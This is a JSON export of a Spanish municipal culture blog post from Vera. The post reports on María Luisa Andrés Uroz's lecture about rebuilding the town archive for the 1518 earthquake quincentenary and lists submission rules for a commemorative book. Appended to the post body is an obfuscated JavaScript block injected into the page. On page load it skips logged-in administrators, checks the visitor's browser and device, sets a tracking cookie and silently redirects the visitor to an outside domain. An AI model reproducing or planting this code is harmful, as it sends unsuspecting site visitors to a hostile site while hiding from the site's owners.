{"id":3527,"date":"2018-03-02T09:44:13","date_gmt":"2018-03-02T09:44:13","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=3527"},"modified":"2018-08-31T07:16:43","modified_gmt":"2018-08-31T07:16:43","slug":"conferencia-de-maria-luisa-andres-uroz-archivera","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2018\/03\/02\/conferencia-de-maria-luisa-andres-uroz-archivera\/","title":{"rendered":"CONFERENCIA DE MAR\u00cdA LUISA ANDR\u00c9S UROZ, ARCHIVERA"},"content":{"rendered":"<p>Hoy, d\u00eda 2 de marzo de 2018, a las 8 de la noche, en el Aula de Cultura de Usos M\u00faltiples (Plaza Mayor de Vera) tendremos el placer de disfrutar de la conferencia de Mar\u00eda Luisa Andr\u00e9s Uroz, ex-directora del Archivo Municipal de Vera y Directora del Archivo Hist\u00f3rico Provincial de Almer\u00eda.<\/p>\n<p><!--more--><\/p>\n<p>La conferencia es la primera de las 12 que forman parte de la programaci\u00f3n de los actos programados para conmemorar el V Centenario del Terremoto de Vera de 1518<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/03\/CONFERENCIA-MARISA-RECORT.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-3528\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/03\/CONFERENCIA-MARISA-RECORT-300x215.jpg\" alt=\"\" width=\"300\" height=\"215\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/03\/CONFERENCIA-MARISA-RECORT-300x215.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/03\/CONFERENCIA-MARISA-RECORT.jpg 598w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Durante la tarde del d\u00eda 3 de marzo, a partir de las 8 de la tarde, en el Aula de Cultura de Usos M\u00faltiples (Plaza Mayor) los vecinos de Vera pudieron disfrutar de la conferencia de Mar\u00eda Luisa Andr\u00e9s Uroz. Su charla es la primera de las doce que compondr\u00e1n el ciclo de conferencias denominado El Renacer de una Ciudad, promovido por la Comisi\u00f3n del V Centenario del Terremoto de Vera de 1518, organizador del A\u00f1o de la Cultura en el Municipio y cuyo pilar fundamental es la Obra de Consolidaci\u00f3n de las Ruinas del Cerro del Esp\u00edritu Santo.<br \/>\nTal como escuchamos del Alcalde-Presidente de la Corporaci\u00f3n F\u00e9lix Mariano L\u00f3pez Caparr\u00f3s en su presentaci\u00f3n y de la Concejala de Cultura del Excmo. Ayuntamiento de Vera, Isabel de Haro, Mar\u00eda Luisa Andr\u00e9s Uroz es licenciada en Geograf\u00eda e Historia y Diplomada en Estudios Avanzados de Historia con el trabajo Agua para beber. Poder municipal y abastecimiento p\u00fablico en una ciudad del sureste (ss. XVI-XX), fue directora del Archivo Municipal de Vera durante los a\u00f1os 1981-2002. Desde 2002 es Directora del Archivo Hist\u00f3rico Provincial de Almer\u00eda, Instituci\u00f3n desde la cual difunde sus fondos al gran p\u00fablico a trav\u00e9s de varios medios de comunicaci\u00f3n, adem\u00e1s de seguir ayudando a los archiveros de la provincia por medio de cursos de formaci\u00f3n anuales con el fin de seguir influyendo en la modernizaci\u00f3n de los Archivos de Almer\u00eda.<br \/>\nSu ponencia fue muy divulgativa y amena, ya que se bas\u00f3 en fotograf\u00edas y documentos gr\u00e1ficos para desarrollar su discurso. Las im\u00e1genes ten\u00edan que ver con el complejo proceso de organizaci\u00f3n que desarroll\u00f3 desde 1981 con el fin de convertir el desordenado, inicial y disperso Archivo documental de Vera en un verdadero centro de investigaci\u00f3n y consulta. De ah\u00ed el t\u00edtulo de la conferencia: El Archivo Municipal de Vera. Cr\u00f3nica de una Recuperaci\u00f3n.<br \/>\nComenz\u00f3 explicando por qu\u00e9 son importantes los documentos de Archivo en sus diferentes edades vitales, desde el valor administrativo inicial, pasando por el fiscal, hasta el hist\u00f3rico, momento en el cual es necesario un especial tratamiento para su conservaci\u00f3n, instalaci\u00f3n y b\u00fasqueda. Incluso su restauraci\u00f3n, dado el caso. Unas im\u00e1genes de aquellos a\u00f1os nos mostraron c\u00f3mo fue necesaria acabar con la dispersi\u00f3n que sufr\u00edan los fondos documentales en esa d\u00e9cada de los a\u00f1os 80; c\u00f3mo fueron habilit\u00e1ndose las salas del Ayuntamiento necesarias para adecentar los espacios m\u00e1s importantes de un Archivo: los dep\u00f3sitos documentales, sin los cuales no es posible la ordenaci\u00f3n e instalaci\u00f3n de las cajas o legajos que contienen los documentos ordenados.<br \/>\nY as\u00ed comenz\u00f3 su trabajo en el Ayuntamiento de Vera, hacia el a\u00f1o 1981, ofreci\u00e9ndose voluntariamente con el fin de organizar un verdadero Archivo. Para ello el instrumento m\u00e1s importante que hubo que elaborar y editar fue la Gu\u00eda e Inventario del Archivo Municipal de Vera (1991). Gracias a \u00e9l todos los usuarios pod\u00edan saber qu\u00e9 serie documental hab\u00eda en cada caja, con qu\u00e9 fechas extremas, el volumen de las mismas, etc., de un fondo documental clasificado en cuatro Secciones, de una manera org\u00e1nico-funcional: Gobierno, Secretar\u00eda, Hacienda y Varios.<br \/>\nLos trabajos de divulgaci\u00f3n sobre la silenciosa labor diaria tambi\u00e9n estuvo ah\u00ed: actos sobre el V Centenario de la toma cristiana de Vera (1988), exposiciones como Reconstruir tu Historia o La Historia en sus Documentos despertaron la curiosidad de esos primeros interesados en la Historia Local y Comarcal. Se alent\u00f3 la publicaci\u00f3n de libros, como la Historia de la Vera Antigua, del Padre Tapia Garrido, el estudio del Libro de Repartimiento de Vera, analizado por Juan Francisco Jim\u00e9nez Alc\u00e1zar (Universidad de Murcia), libros de leyendas y costumbres del Municipio o Fuentes Documentales para el Estudio de la Tierra de Vera, inventario anal\u00edtico del fondo judicial de Vera, realizado en colaboraci\u00f3n con el Archivo Hist\u00f3rico Provincial de Almer\u00eda en 1999; interesantes trabajos de investigaci\u00f3n hist\u00f3rica, como los relacionados con el estudio del agua y el riego en Vera, las primeras familias de colonos soldados, etc., fueron publicados en Revista Axarqu\u00eda, entre otras.<br \/>\nAndr\u00e9s Uroz colabor\u00f3 en varios centros muse\u00edsticos de Vera, como el Museo Taurino, o mediante la elaboraci\u00f3n de folletos o tr\u00edpticos destinados al Turismo.<br \/>\nDurante la charla se mostraron varios documentos antiguos del rico fondo hist\u00f3rico que fueron catalogados por ella misma y que tienen una gran importancia hist\u00f3rica, como puedan ser el Fuero de Vera, normas b\u00e1sicas iniciales sobre la organizaci\u00f3n pol\u00edtica y social del Municipio, el Pleito entre Lorca y Vera por la tierra de Hu\u00e9rcal y Overa, documentos reales firmados por los Reyes Cat\u00f3licos sobre las normas a cumplir en diferentes circunstancias, Bandos de Alcald\u00eda sobre los usos y costumbres a seguir por los vecinos, etc.<br \/>\nTras la agradable exposici\u00f3n, muy bien acogida por el p\u00fablico asistente, F\u00e9lix Mariano L\u00f3pez Caparr\u00f3s agradeci\u00f3 a Mar\u00eda Luisa Andr\u00e9s Uroz el trabajo realizado durante esos veinte a\u00f1os dedicados al Ayuntamiento de Vera y se le obsequi\u00f3 con una jarra de cinco picos, pieza de cer\u00e1mica representativa de este Municipio veratense.<\/p>\n<p>&#8212;&#8212;&#8212;<\/p>\n<p>Recordamos durante el a\u00f1o 2019 se presentar\u00e1 un libro de actas que incluir\u00e1 todos los art\u00edculos y ponencias que se hayan realizado o presentado sobre Vera y su Tierra.<\/p>\n<p>Recordamos las caracter\u00edsticas formales de los textos a presentar:<\/p>\n<p align=\"left\"><u><b>V Centenario del Terremoto de Vera. El libro. <\/b><\/u><u><b>Bases de los textos de investigaci\u00f3n para su publicaci\u00f3n<\/b><\/u><\/p>\n<p align=\"left\">El a\u00f1o 2018 est\u00e1 marcado en rojo en el calendario de la ciudad de Vera por la <b>conmemoraci\u00f3n de dos importantes aniversarios<\/b>: el quinto centenario del terremoto que destruy\u00f3 la antigua ciudad, situada en el cerro del Esp\u00edritu Santo, y los 50 a\u00f1os de los Festivales de Arte, antesala de las Fiestas Patronales de San Cleof\u00e1s.<\/p>\n<p align=\"left\">Por ello, <b>el Pleno declar\u00f3 por unanimidad el 2018 como \u2018A\u00f1o de la Cultura\u2019<\/b>, por lo que se suceder\u00e1n las actividades culturales de todo tipo a lo largo de los doce meses.<\/p>\n<p align=\"left\">V Centenario del Terremoto de Vera. El libro acepta y publicar\u00e1 art\u00edculos sobre temas de Antropolog\u00eda social y cultural de car\u00e1cter descriptivo o etnogr\u00e1fico, de Historia, teniendo como nexo en com\u00fan la Vera de los siglos XIV- XV-XVI y XVII, o de Arqueolog\u00eda centr\u00e1ndose en el cerro Esp\u00edritu Santo.<\/p>\n<p align=\"left\">Se pretende hacer un libro t\u00e9cnico, dirigido sobre todo a especialistas e investigadores. Tiene como objetivo principal la publicaci\u00f3n de art\u00edculos originales e in\u00e9ditos, que sean el resultado de investigaciones emp\u00edricas y que supongan un incremento de nuestro conocimiento sobre la tem\u00e1tica a tratar.<\/p>\n<p align=\"left\">El idioma ser\u00e1 el espa\u00f1ol.<\/p>\n<p align=\"left\"><b>1. Formato y presentaci\u00f3n. <\/b><\/p>\n<p align=\"left\">Los textos se enviar\u00e1n en <b>formato digita<\/b>l (archivo\/fichero .doc), con una <b>extensi\u00f3n m\u00e1xima de 50.000 caracteres<\/b>, y antecedidos por:<\/p>\n<p align=\"left\">&#8211; El <b>t\u00edtulo del trabajo en espa\u00f1ol y su correcta traducci\u00f3n al ingl\u00e9s<\/b>, <b>fecha de finalizaci\u00f3n<\/b>, un <b>resumen <\/b>(de extensi\u00f3n entre 50 y 100 palabras) en espa\u00f1ol e ingl\u00e9s, y cinco <b>palabras clave (en espa\u00f1ol e ingl\u00e9s)<\/b>. El manuscrito ir\u00e1 acompa\u00f1ado de <b>otra p\u00e1gina con los datos personales y profesionales del autor o autores<\/b>, su <b>filiaci\u00f3n institucional y profesional<\/b>, <b>direcci\u00f3n particular <\/b>completa y del <b>centro de trabajo<\/b>, <b>e-mail <\/b>y otra informaci\u00f3n de contacto.<\/p>\n<p align=\"left\">Se aplicar\u00e1 <b>tipograf\u00eda Times New Roman con cuerpo 12<\/b>, <b>interlineado simple<\/b>, apareciendo <b>los t\u00edtulos de los apartados en negrita <\/b>y las <b>citas en redonda y entre comillas inglesas dobles<\/b>. Ha de utilizarse el mismo tipo y tama\u00f1o de letra en todo el escrito: el t\u00edtulo, los res\u00famenes, el texto, las citas literales, las notas y la bibliograf\u00eda.<\/p>\n<p align=\"left\">En art\u00edculos que superen la extensi\u00f3n m\u00e1xima establecida deber\u00e1 ser informados a la Redacci\u00f3n y que estos la aprueben.<\/p>\n<p align=\"left\"><b>2. Cita o referencias bibliogr\u00e1ficas. <\/b><\/p>\n<p align=\"left\">Las <b>notas <\/b>ir\u00e1n <b>al final del texto <\/b>y no a pie de p\u00e1gina siguiendo las siguientes recomendaciones cuando se trate de <b>citas bibliogr\u00e1ficas<\/b>:<\/p>\n<p align=\"left\">\u2022 <b>Referencia a una monograf\u00eda<\/b>:<\/p>\n<p align=\"left\">MART\u00cdNEZ POZO, M.A.: <i>Moros y cristianos en el mediterr\u00e1neo espa\u00f1ol. Antropolog\u00eda, educaci\u00f3n, historia y valores. <\/i>Ed. Gami. Granada, 2015.<\/p>\n<p align=\"left\">\u2022 <b>Referencia a una contribuci\u00f3n dentro de una obra colectiva<\/b>: MORENO, I.: \u00abPoder, mercado e identidades colectivas. Las fiestas populares en la encrucijada\u00bb en OLIVER NARBONA, M. (Coord.): <i>Jornadas de Antropolog\u00eda de las fiestas. Identidad, mercado y poder. <\/i>Expofiesta. Feria Nacional de Fiestas Populares, 1999. p. 18-19.<\/p>\n<p align=\"left\">\u2022 <b>Referencia a un art\u00edculo de una publicaci\u00f3n peri\u00f3dica: <\/b><\/p>\n<p align=\"left\">MART\u00cdNEZ POZO, M.A.: \u00abGastronom\u00eda, arte culinario y bebidas en las fiestas de moros y cristianos\u00bb en <i>Revista Folklore, 394<\/i>. A\u00f1o 2014. p. 11-21.<\/p>\n<p align=\"left\">\u2022 <b>Referencia a documentos: <\/b>Archivo Hist\u00f3rico Diocesano de Guadix (AHDGu).<\/p>\n<p align=\"left\">La bibliograf\u00eda se limitar\u00e1 a los materiales (libros, art\u00edculos,&#8230;) referidos o citados en el texto; por tanto, no deber\u00e1n incluirse en la bibliograf\u00eda materiales que no hayan sido referidos o citados antes en este.<\/p>\n<p align=\"left\">La organizaci\u00f3n de la bibliograf\u00eda se har\u00e1 por orden alfab\u00e9tico de los apellidos de los autores.<\/p>\n<p align=\"left\">Si hay varias referencias de un mismo autor, ir\u00e1n ordenadas cronol\u00f3gicamente por a\u00f1o de edici\u00f3n, de la m\u00e1s antigua a la m\u00e1s reciente.<\/p>\n<p align=\"left\"><b>3. Ilustraciones. <\/b><\/p>\n<p align=\"left\">Los textos se pueden acompa\u00f1ar de <b>gr\u00e1ficos <\/b>y <b>fotograf\u00edas <\/b>siempre que \u00e9stos <b>se puedan publicar de manera libre y gratuita<\/b>, vayan con sus correspondientes <b>pies de imagen con indicaci\u00f3n de autor\u00eda o fuente<\/b>, y se indique el <b>punto de inserci\u00f3n deseado<\/b>. Las im\u00e1genes se presentar\u00e1n en <b>formato digital estandarizado <\/b>(jpg para fotograf\u00edas) y <b>en archivos independientes<\/b>, con calidad suficiente (<b>resoluci\u00f3n m\u00ednima 300 ppp<\/b>).<\/p>\n<p align=\"left\"><b>4. Proceso de evaluaci\u00f3n. <\/b><\/p>\n<p align=\"left\"><i>V Centenario del Terremoto de Vera. El libro\u00bb <\/i><b>confirmar\u00e1 la recepci\u00f3n de los manuscritos<\/b>. <b>El consejo editorial decidir\u00e1 sobre su publicaci\u00f3n siempre y cuando re\u00fana las condiciones \u00f3ptimas y cumpla con las bases reguladoras<\/b>. <b>Los materiales ser\u00e1n enviados a tres revisores an\u00f3nimos e independientes seleccionados por el consejo editorial y por el editor<\/b>, que juzgar\u00e1n la idoneidad de su publicaci\u00f3n y, en su caso, establecer\u00e1n las recomendaciones o indicaciones oportunas. Los art\u00edculos de las conferencias establecidas, coordinados por el comit\u00e9, tambi\u00e9n ser\u00e1n evaluados de forma an\u00f3nima y revisados anteriormente a su publicaci\u00f3n.<\/p>\n<p align=\"left\"><b>La versi\u00f3n final, antes de su publicaci\u00f3n, ser\u00e1 enviada al autor para que d\u00e9 el visto bueno, teniendo de plazo una semana para su revisi\u00f3n.<\/b>Los art\u00edculos y materiales para publicaci\u00f3n deben enviarse por correo electr\u00f3nico a <i><b>libroterremotodevera.outlook.es <\/b><\/i><\/p>\n<p align=\"left\">Los autores podr\u00e1n contactar con la editora (D\u00f1a. Ana Mar\u00eda G\u00f3mez Rom\u00e1n) por correo electr\u00f3nico en <i><b>libroterremotodevera.outlook.es <\/b><\/i><\/p>\n<p align=\"left\"><b>4. Plazo de presentaci\u00f3n de art\u00edculos. <\/b><\/p>\n<p align=\"left\">El plazo de presentaci\u00f3n de art\u00edculos terminar\u00e1 el d\u00eda 17 de diciembre de 2018. Todo art\u00edculo o conferencia entregada fuera de plazo no formar\u00e1 parte del libro.<\/p>\n<p align=\"left\"><b>5. Presentaci\u00f3n del libro. <\/b><\/p>\n<p>La presentaci\u00f3n del libro se realizar\u00e1 durante el mes de febrero de 2019 coincidiendo con la finalizaci\u00f3n del ciclo de conferencias y, especialmente con el d\u00eda 19 de febrero, por ser el nacimiento de la Vera Nueva.<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hoy, d\u00eda 2 de marzo de 2018, a las 8 de la noche, en el Aula de Cultura de Usos M\u00faltiples (Plaza Mayor de Vera) tendremos el placer de disfrutar de la conferencia de Mar\u00eda Luisa Andr\u00e9s Uroz, ex-directora del Archivo Municipal de Vera y Directora del Archivo Hist\u00f3rico Provincial de Almer\u00eda.<\/p>\n","protected":false},"author":7,"featured_media":3528,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[105,3,109],"tags":[283,68],"class_list":["post-3527","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-actividades","category-archivo","category-historia","tag-comision-del-v-centenario-del-terremoto-de-vera","tag-maria-luisa-andres-uroz"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3527","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=3527"}],"version-history":[{"count":4,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3527\/revisions"}],"predecessor-version":[{"id":3666,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3527\/revisions\/3666"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/3528"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=3527"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=3527"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=3527"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}